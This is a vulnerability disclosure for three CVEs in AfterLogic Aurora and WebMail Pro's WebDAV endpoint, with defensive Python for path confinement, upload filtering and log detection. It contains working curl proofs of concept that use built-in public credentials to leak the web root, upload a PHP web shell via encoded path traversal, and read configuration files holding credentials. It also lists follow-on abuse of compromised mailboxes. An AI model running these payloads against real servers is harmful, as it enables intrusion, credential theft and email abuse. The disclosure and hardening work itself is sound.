# **CVE-2021-26292** - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV EndPoint
**The severity of the issue:** Medium
**Complexity:** Easy
**Affected Products:** AfterLogic Aurora, AfterLogic WebMail PRO
**Authentication:** Not required
**Attacks:** Full Path Disclosure
## **Resources:**
- https://owasp.org/www-community/attacks/Full_Path_Disclosure
- https://owasp.org/www-community/attacks/Path_Traversal
## **Authors:**
- Emre KELEŞ - @emrekeles on twitter [![Twitter URL](https://camo.githubusercontent.com/ef170a52d7714884473e0eb93c8bef969381b7a9bdc4d863d9f67dcd1b4e87cd/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f656d72656b656c65732e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f77253230253430656d72656b656c6573)](https://twitter.com/emrekeles)
- Emircan YILDIZ - @scorpsec on twitter [![Twitter URL](https://camo.githubusercontent.com/3aaccd4caf1dfaf307ec7abcab808e9dfb61ddb579584fa6c81afcb4428903b1/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f73636f72707365632e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f7725323025343073636f7270736563)](https://twitter.com/scorpsec)
- Halil Emre ÖZEN - @halilemreozen on twitter [![Twitter URL](https://camo.githubusercontent.com/81e812b498b8eaf9c672c09ec7a1bdb9afa2447889939eacd3bcb75abadd6a85/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f68616c696c656d72656f7a656e2e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f7725323025343068616c696c656d72656f7a656e)](https://twitter.com/halilemreozen)
## **Report Summary:**
AfterLogic Aurora and WebMail Pro 7.7.9 and all lower versions are affected by this vulnerability: simply sending an HTTP DELETE request to the WebDAV endpoint with the built-in “**caldav_public_user@localhost**” account and its predefined password “**caldav_public_user**” allows the attacker to obtain the web root path.
## **To Reproduce:**
Get the web root path with the following curl command
```
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
```
## **Response:**
```
<?xml version="1.0" encoding="utf-8"?>
<d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns">
<s:exception>Sabre\DAV\Exception\NotFound</s:exception>
<s:message>File with name /var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 could not be located</s:message>
</d:error>
```
In this scenario, **/var/www/html/www/webmailpro.dev** is the web root path. This information becomes especially valuable when combined with file upload vulnerabilities.
## **Technical Description:**
- dav\server.php (handles the request and creates the \afterlogic\DAV\Server instance)
- \libraries\Sabre\DAV\server.php -> exec (passes the request method and URI to invokeMethod)
- \libraries\Sabre\DAV\server.php -> invokeMethod
- \libraries\Sabre\DAV\server.php -> httpDelete
- \libraries\Sabre\DAV\Tree.php -> delete
- \libraries\Sabre\DAV\ObjectTree.php -> getNodeForPath
- \libraries\Sabre\DAV\FS\Directory.php -> getChild
The web root path disclosure starts at step 7, getChild: in the line `\Sabre\DAV\Exception\NotFound('File with name ' . $path . ' could not be located')`, the **$path** variable contains the web root path.
Because of the above, any user who can log in can obtain the web root path; with the caldav_public_user@localhost account, attackers don’t need any user information because it has a predefined password, so the vulnerability becomes publicly accessible.
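The fix for this disclosure is to keep the resolved filesystem path out of any message that reaches the client. The following Python sketch is an added example, not AfterLogic's or SabreDAV's code: it puts the leaking lookup beside a hardened one, renders the same `<d:error>` body shape shown above, and includes a check a reviewer can run against a response body. The storage root and file name are constructed values taken from the report's example response.

```python
from pathlib import Path
from xml.sax.saxutils import escape


class NotFound(Exception):
    """WebDAV 404. Its message is rendered into the response body verbatim,
    so it must never carry a filesystem path."""


def get_child_leaky(user_root: Path, name: str) -> Path:
    """Shape of the vulnerable lookup: the message embeds the resolved path."""
    path = user_root / name
    if not path.exists():
        # $path in the original includes the document root; here it leaks too.
        raise NotFound(f"File with name {path} could not be located")
    return path


def get_child_safe(user_root: Path, name: str) -> Path:
    """Hardened lookup: report only the name the client asked for."""
    path = user_root / name
    if not path.exists():
        raise NotFound(f"File with name {name} could not be located")
    return path


def render_dav_error(exc: Exception) -> str:
    """Render a SabreDAV-style <d:error> body like the one in the report."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns">\n'
        f"  <s:exception>{type(exc).__name__}</s:exception>\n"
        f"  <s:message>{escape(str(exc))}</s:message>\n"
        "</d:error>\n"
    )


def error_body(lookup, user_root: Path, name: str) -> str:
    """Run a lookup and return the error body a client would receive ('' on success)."""
    try:
        lookup(user_root, name)
    except NotFound as exc:
        return render_dav_error(exc)
    return ""


def leaks_server_path(body: str, user_root: Path) -> bool:
    """Response check: does the body reveal the private storage root?"""
    return str(user_root) in body


if __name__ == "__main__":
    # Constructed values taken from the report's example response.
    root = Path("/var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost")
    name = "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
    for lookup in (get_child_leaky, get_child_safe):
        body = error_body(lookup, root, name)
        print(f"{lookup.__name__}: leaks root = {leaks_server_path(body, root)}")
        print(body)
```

`leaks_server_path` is the kind of assertion worth keeping in a regression test: request a nonexistent child and confirm the 404 body never contains the storage root.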
# **CVE-2021-26293** - RCE via Public unrestricted upload with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint
**Base Score:** 9.8 CRITICAL
**Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
**Complexity:** Easy
**Affected Products:** AfterLogic Aurora, AfterLogic WebMail PRO
**Authentication:** Not required
**Attacks:** Directory Traversal, Unrestricted Upload of File with Dangerous Type, Public Built-in Credentials For Critical Function
**Gained Access:** WebServer user ( Apache, Nginx, Etc… )
## **Resources:**
- https://owasp.org/www-community/attacks/Full_Path_Disclosure
- https://owasp.org/www-community/attacks/Path_Traversal
- https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
## **Authors:**
- Emre KELEŞ - @emrekeles on twitter [![Twitter URL](https://camo.githubusercontent.com/ef170a52d7714884473e0eb93c8bef969381b7a9bdc4d863d9f67dcd1b4e87cd/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f656d72656b656c65732e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f77253230253430656d72656b656c6573)](https://twitter.com/emrekeles)
- Emircan YILDIZ - @scorpsec on twitter [![Twitter URL](https://camo.githubusercontent.com/3aaccd4caf1dfaf307ec7abcab808e9dfb61ddb579584fa6c81afcb4428903b1/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f73636f72707365632e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f7725323025343073636f7270736563)](https://twitter.com/scorpsec)
- Halil Emre ÖZEN - @halilemreozen on twitter [![Twitter URL](https://camo.githubusercontent.com/81e812b498b8eaf9c672c09ec7a1bdb9afa2447889939eacd3bcb75abadd6a85/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f68616c696c656d72656f7a656e2e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f7725323025343068616c696c656d72656f7a656e)](https://twitter.com/halilemreozen)
## **Report Summary:**
AfterLogic Aurora and WebMail Pro 7.7.9 and all lower versions are affected by this vulnerability: simply sending an HTTP PUT request to the WebDAV endpoint with the built-in “**caldav_public_user@localhost**” account and its predefined password “**caldav_public_user**” allows the attacker to create/overwrite files with malicious files such as web shells or database dumpers, etc.
After uploading a malicious PHP file to the web server, some example actions the attacker can take:
1. Download / modify the database
   1. Email addresses with easily decodable passwords
   2. CalDAV data (calendars of the users)
   3. CardDAV data (contacts of the users)
2. Download user-uploaded private WebDAV files.
3. Intercept to read/modify emails of webmail users.
   1. A way to read emails, because webmail servers are usually whitelisted on mail servers while normal clients have thresholds
   2. A good way to spread malicious executables/mails to users without struggling with mail gateways/spam blockers.
   3. Acting like the real user and sending vicious emails to important users/companies
   4. Sending bulk emails for spam campaigns.
4. Attempt privilege escalation to get root/administrator on the server.
Etc...
## **To Reproduce:**
Upload the malicious file with the following curl command
```
curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
```
As the AfterLogic WebMail Pro docs mention, “the web root usually looks like /var/www/html”, and the above PoC assumes files are located under Apache’s standard /var/www/html path. It may differ due to configuration, but that is not a blocker for the attacker, because we realized that some of the endpoints expose the document root path when an invalid path parameter is requested.
Ways to figure out the document root directory on customized web server configurations:
1. Using an invalid path to get a SabreDAV error, which gives full path disclosure of the web root.
   ```
   curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
   ```
2. Trying common web server paths
3. Brute force (append another ../ to the URL until getting HTTP 200 for the uploaded malicious file)
## **Technical Description:**
- dav\server.php (handles the request and creates the \afterlogic\DAV\Server instance)
- \libraries\Sabre\DAV\server.php -> exec (passes the request method and URI to invokeMethod)
- \libraries\Sabre\DAV\server.php -> invokeMethod
- \libraries\Sabre\DAV\server.php -> httpPut
- \libraries\Sabre\DAV\FS\File.php -> put
The Unrestricted Upload of File with Dangerous Type and Directory Traversal problems start at step 2, exec: it neither sanitizes the given parameters nor checks the file extension, so the attacker is able to write to upper directories and execute the malicious file.
Because of the above, any user who can log in can upload malicious files; with the caldav_public_user@localhost account, attackers don’t need any user information because it has a predefined password, so the vulnerability becomes publicly accessible.
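Both the traversal and the dangerous-file-type problem come down to trusting the request URI as a filesystem path. Below is an added Python example (not the project's code) of how a WebDAV storage layer can confine a `files/personal/...` request path to the user's private directory and refuse server-executable file types on upload. `resolve_within`, `check_upload_name`, `is_rejected`, the storage root path and the extension denylist are assumptions constructed for this example; the traversal inputs are the shapes shown in the PoCs on this page.

```python
import os
from urllib.parse import unquote


class Forbidden(Exception):
    """Raised for any request that would reach outside the caller's storage root."""


# Constructed denylist of types the web server would execute if they ever landed
# under the document root; the primary fix is keeping user storage outside it.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php5", "phtml", "phar"}


def fully_decode(path: str) -> str:
    """Percent-decode until stable, so %252e%252e (double encoding) is caught too."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path


def resolve_within(user_root: str, request_path: str) -> str:
    """Map the part of the DAV URI after files/personal/ onto the user's directory.

    Every '..' segment is refused up front, and the resolved path is then checked
    to still lie under user_root, so a traversal cannot slip through either way.
    """
    decoded = fully_decode(request_path)
    if "\x00" in decoded:
        raise Forbidden("NUL byte in path")
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if ".." in segments:
        raise Forbidden("parent-directory segment in path")
    root = os.path.realpath(user_root)
    target = os.path.realpath(os.path.join(root, *segments))
    if os.path.commonpath([root, target]) != root:
        raise Forbidden("resolved path escapes the storage root")
    return target


def check_upload_name(request_path: str) -> None:
    """Refuse server-executable file types, including shell.php.jpg style names."""
    name = fully_decode(request_path).rsplit("/", 1)[-1].lower()
    if any(part in EXECUTABLE_EXTENSIONS for part in name.split(".")[1:]):
        raise Forbidden(f"refusing to store server-executable file {name}")


def is_rejected(user_root: str, request_path: str, upload: bool = False) -> bool:
    """Convenience wrapper: True when the request would be refused."""
    try:
        if upload:
            check_upload_name(request_path)
        resolve_within(user_root, request_path)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    # Constructed storage root; outside the document root by design.
    root = "/srv/webmail-data/files/private/caldav_public_user@localhost"
    for path in ("notes/2021.txt",
                 "%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml",
                 "shell.php"):
        print(path, "->", "rejected" if is_rejected(root, path, upload=True) else "allowed")
```

Two design points: decoding runs to a fixed point before the `..` check, since a single `unquote` would let a double-encoded segment through, and the `commonpath` check after `realpath` is kept even though the segment check already refuses `..`, so a symlink inside the user directory cannot redirect a write elsewhere.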
# **CVE-2021-26294** - Exposure of sensitive information to an unauthorized actor with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint
**Base Score:** 7.5 HIGH
**Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
**Complexity:** Easy
**Affected Products:** AfterLogic Aurora, AfterLogic WebMail PRO
**Authentication:** Not required
**Attacks:** Directory Traversal, Public Built-in Credentials For Critical Function
## **Resources:**
- https://owasp.org/www-community/attacks/Path_Traversal
## **Authors:**
- Emre KELEŞ - @emrekeles on twitter [![Twitter URL](https://camo.githubusercontent.com/ef170a52d7714884473e0eb93c8bef969381b7a9bdc4d863d9f67dcd1b4e87cd/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f656d72656b656c65732e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f77253230253430656d72656b656c6573)](https://twitter.com/emrekeles)
- Emircan YILDIZ - @scorpsec on twitter [![Twitter URL](https://camo.githubusercontent.com/3aaccd4caf1dfaf307ec7abcab808e9dfb61ddb579584fa6c81afcb4428903b1/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f73636f72707365632e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f7725323025343073636f7270736563)](https://twitter.com/scorpsec)
- Halil Emre ÖZEN - @halilemreozen on twitter [![Twitter URL](https://camo.githubusercontent.com/81e812b498b8eaf9c672c09ec7a1bdb9afa2447889939eacd3bcb75abadd6a85/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f68747470732f747769747465722e636f6d2f68616c696c656d72656f7a656e2e7376673f7374796c653d736f6369616c266c6162656c3d466f6c6c6f7725323025343068616c696c656d72656f7a656e)](https://twitter.com/halilemreozen)
## **Report Summary:**
AfterLogic Aurora and WebMail Pro 7.7.9 and all lower versions are affected by this vulnerability: simply sending an HTTP GET request to the WebDAV endpoint with the built-in “caldav_public_user@localhost” account and its predefined password “caldav_public_user” allows the attacker to read all files under the web root.
## **To Reproduce:**
Read any file with the following curl command
```
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
```
The sample curl command will retrieve the license key, database credentials, admin panel credentials, etc.
## **Technical Description:**
- dav\server.php (handles the request and creates the \afterlogic\DAV\Server instance)
- \libraries\Sabre\DAV\server.php -> exec (passes the request method and URI to invokeMethod)
- \libraries\Sabre\DAV\server.php -> invokeMethod
- \libraries\Sabre\DAV\server.php -> httpGet
The Directory Traversal problem starts at step 2, exec: it neither sanitizes the given parameters nor checks the file extension, and combined with the httpGet business logic (reading the file content and returning it), the attacker is able to read any file under the web root.
Because of the above, any user who can log in can read configuration files; with the caldav_public_user@localhost account, attackers don’t need any user information because it has a predefined password, so the vulnerability becomes publicly accessible.
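Operators who cannot patch immediately can at least spot exploitation of the three issues on this page in the web server's access log. The following added Python example (not from the report or the vendor) scans Apache-style combined log lines for percent-encoded `..` segments on the `/dav/server.php` path and for use of the built-in `caldav_public_user@localhost` account. The log lines are constructed for the example, and it assumes the server records the Basic-auth user in the remote-user field; when PHP handles authentication that field is `-`, and only the traversal rule fires.

```python
import re
from urllib.parse import unquote

# Built-in account named in the advisory; legitimate use of it over DAV should be rare.
PUBLIC_ACCOUNT = "caldav_public_user@localhost"
DAV_PREFIX = "/dav/server.php"

# Apache/Nginx "combined" format. Assumption: the remote-user field carries the
# HTTP Basic user; with PHP-side auth it is "-" and only the traversal rule applies.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines; the request shapes follow the PoCs in this report.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [11/Jan/2021:10:15:01 +0000] "GET /dav/server.php/files/personal/'
    '%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 200 4123 "-" "curl/7.68.0"',
    '203.0.113.5 - caldav_public_user@localhost [11/Jan/2021:10:15:02 +0000] "PUT /dav/server.php/'
    'files/persona/%2e%2e/%2e%2e//var/www/html/shell.php HTTP/1.1" 201 0 "-" "curl/7.68.0"',
    '198.51.100.7 - alice@example.test [11/Jan/2021:10:16:30 +0000] "GET /dav/server.php/files/'
    'personal/report.pdf HTTP/1.1" 200 88211 "-" "Mozilla/5.0"',
    '203.0.113.5 - caldav_public_user@localhost [11/Jan/2021:10:17:00 +0000] "DELETE /dav/server.php/'
    'files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1" 404 512 "-" "curl/7.68.0"',
]


def fully_decode(path: str) -> str:
    """Percent-decode until stable so double-encoded %252e%252e is caught as well."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path


def has_traversal(path: str) -> bool:
    """True when any path segment is '..' after full decoding."""
    return any(seg == ".." for seg in fully_decode(path).split("/"))


def scan(lines):
    """Return one finding per suspicious DAV request, with the rules that matched."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith(DAV_PREFIX):
            continue
        rules = []
        if has_traversal(m["path"]):
            rules.append("traversal")
        if m["user"] == PUBLIC_ACCOUNT:
            rules.append("public_account")
        if not rules:
            continue
        status = int(m["status"])
        # A 2xx/3xx on a writing method means the file system was actually changed.
        write_ok = m["method"] in {"PUT", "DELETE", "MOVE", "COPY"} and status < 400
        findings.append({
            "line": n, "ip": m["ip"], "method": m["method"], "status": status,
            "path": m["path"], "rules": rules, "write_succeeded": write_ok,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG_LINES):
        flag = " WRITE SUCCEEDED" if f["write_succeeded"] else ""
        print(f"line {f['line']}: {f['ip']} {f['method']} {f['status']} {f['rules']}{flag}")
```

Traversal hits with a 2xx status on a PUT are the ones to treat as a confirmed compromise rather than an attempt; a DELETE that returned 404 is the path-disclosure probe from the first report and is worth alerting on even though nothing was changed.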